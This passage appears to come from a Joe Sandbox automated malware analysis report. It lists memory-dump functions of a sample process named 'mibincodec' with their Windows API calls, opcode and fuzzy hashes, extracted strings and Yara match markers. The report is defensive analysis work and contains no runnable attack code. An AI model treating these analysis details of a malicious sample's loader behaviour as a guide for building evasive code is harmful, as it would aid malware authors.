                                                                  • Opcode ID: 293ba0d8bcd137fe2ddd6faad5df7dd894d6dc9fc8076330fbcb3b2243b4eac9
                                                                  • Instruction ID: 12543f956f49ba5df466434fd48d399b28cda5f2a75a3aaef9f0cfda7fbd2c59
                                                                  • Opcode Fuzzy Hash: 293ba0d8bcd137fe2ddd6faad5df7dd894d6dc9fc8076330fbcb3b2243b4eac9
                                                                  • Instruction Fuzzy Hash: 3C014F35B81241AFD7D4BBB5B86063B22E79BC06947150869F235CB384EB34DC514B91
                                                                  Function 021B27B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 427982af8409aa733b288edc5ce16a333f90a22b14db1b118aa18f191a1dec00
                                                                  • Instruction ID: f5b17ef96989d7fe12a11dc186f0162cd2417707a9d812043245ecbaa595aacb
                                                                  • Opcode Fuzzy Hash: 427982af8409aa733b288edc5ce16a333f90a22b14db1b118aa18f191a1dec00
                                                                  • Instruction Fuzzy Hash: 14D09EB4D80208BFD741EFA4E95AB9DBBB4EF04702F108165E91567241E7705A148F52
                                                                  Function 021B1820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 021B182F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 779319e8929f5e48e26d5cec05c100b061a57d2ea217fbc5ed9228526683356c
                                                                  • Instruction ID: ef8dc75cb3707511fa77580ff18b72113f500bd412893dce756be5eb0b68292d
                                                                  • Opcode Fuzzy Hash: 779319e8929f5e48e26d5cec05c100b061a57d2ea217fbc5ed9228526683356c
                                                                  • Instruction Fuzzy Hash: 2EC04C7A55420CAB8B04DF98E894DAB77FDBB8C610B048548BA1D87200C630F9608BA4

                                                                  Non-executed Functions

                                                                  Function 021F9FA0 Relevance: 19.6, APIs: 3, Strings: 8, Instructions: 310COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 021FA0FB
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA0FE
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess
                                                                  • String ID: 79V#$79V#$79V#$>p$>p$p^5w$.#v$Ei
                                                                  • API String ID: 2050909247-1755071274
                                                                  • Opcode ID: 0538f057617ba60ef834776071eb9ffe93e0c09953074584ad9f129310d59281
                                                                  • Instruction ID: 7d07641aecb5a47a26938dd42b4d794c50c82357f0f7aa53a5b441982ac92b98
                                                                  • Opcode Fuzzy Hash: 0538f057617ba60ef834776071eb9ffe93e0c09953074584ad9f129310d59281
                                                                  • Instruction Fuzzy Hash: D7A1EF71B842019FCB94EB68A49062F32E6AFC4644F65096DF779DB340EB38DC418BD2
                                                                  Function 021F9FC8 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 021FA0FB
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA0FE
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess
                                                                  • String ID: 79V#$79V#$79V#$>p
                                                                  • API String ID: 2050909247-2830606539
                                                                  • Opcode ID: 4b044b2f073d3f47758a4dbc816e0e2806251e9532be6d1b6ba1011879c931c3
                                                                  • Instruction ID: 9474ca584f18cfeb4f8b9876a327a74e0e93161b7b80dc54d36626d59a6917c8
                                                                  • Opcode Fuzzy Hash: 4b044b2f073d3f47758a4dbc816e0e2806251e9532be6d1b6ba1011879c931c3
                                                                  • Instruction Fuzzy Hash: 5231C431F812509BCB90AAA8649472F36D7AFC4784F290959EBB9D7250EF38DC414BD1
                                                                  Function 021B14A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021B14DB
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021B1507
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: dba912d3f4bb9cc6977b4580150c7e52e74ecb9038743cac4a034ba6f30d49a2
                                                                  • Instruction ID: 389f60e86b6d0469a472184474509ceef4dc307803a54fc7ce8e1ce91e87d4f3
                                                                  • Opcode Fuzzy Hash: dba912d3f4bb9cc6977b4580150c7e52e74ecb9038743cac4a034ba6f30d49a2
                                                                  • Instruction Fuzzy Hash: B8711974E40109EFDB09DF94C591BAEB7B2FF48304F258598E51AAB341D774AA81CF90
                                                                  Function 021F12B0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E?*$a7a&$a7a&$Ei$Ei
                                                                  • API String ID: 0-288907479
                                                                  • Opcode ID: c9bd78de32a3ecfbcbcd506ccc85d1ff1d921d12d32957eaa052150ebdddcd1b
                                                                  • Instruction ID: e88e066a070718a50e042272f930097804b0234d5039a056a5639cf8f047964f
                                                                  • Opcode Fuzzy Hash: c9bd78de32a3ecfbcbcd506ccc85d1ff1d921d12d32957eaa052150ebdddcd1b
                                                                  • Instruction Fuzzy Hash: C5E1AE71688241EFC798DF68D490A6FB3E6ABC4344F14491DEABAD7340DB34E905CB92
                                                                  Function 021B21A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 021B21F9
                                                                  • SetLastError.KERNEL32(0000007E), ref: 021B223B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHugeLastRead
                                                                  • String ID:
                                                                  • API String ID: 3239643929-0
                                                                  • Opcode ID: e8d434907652df0c0ec9d9797f59f0ba0157d082feeea6b84f55e5c896ee3053
                                                                  • Instruction ID: beca8318521c637b0d66a530cbaa565604e7c454a404e38b0e126f93f8851088
                                                                  • Opcode Fuzzy Hash: e8d434907652df0c0ec9d9797f59f0ba0157d082feeea6b84f55e5c896ee3053
                                                                  • Instruction Fuzzy Hash: 6381B974A40209EFDB09DF94C894BAEB7B1FF88314F148198E919AB351C734EA95CF91
                                                                  Function 021B2430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 021B2468
                                                                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021B24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: @
                                                                  • API String ID: 544645111-2766056989
                                                                  • Opcode ID: 79f2469ea0889e90942112e25491720d637a84c84d50eca08ab80dc105bb249d
                                                                  • Instruction ID: 1d1c04aa63e66fcdcde06257e2d11f52d8491e0a8e86fc2926125fc2259944dc
                                                                  • Opcode Fuzzy Hash: 79f2469ea0889e90942112e25491720d637a84c84d50eca08ab80dc105bb249d
                                                                  • Instruction Fuzzy Hash: 132107B0E44208EFDF09CF98C980BEDBBB5BF44304F208589DD15AB640C774AA84DB51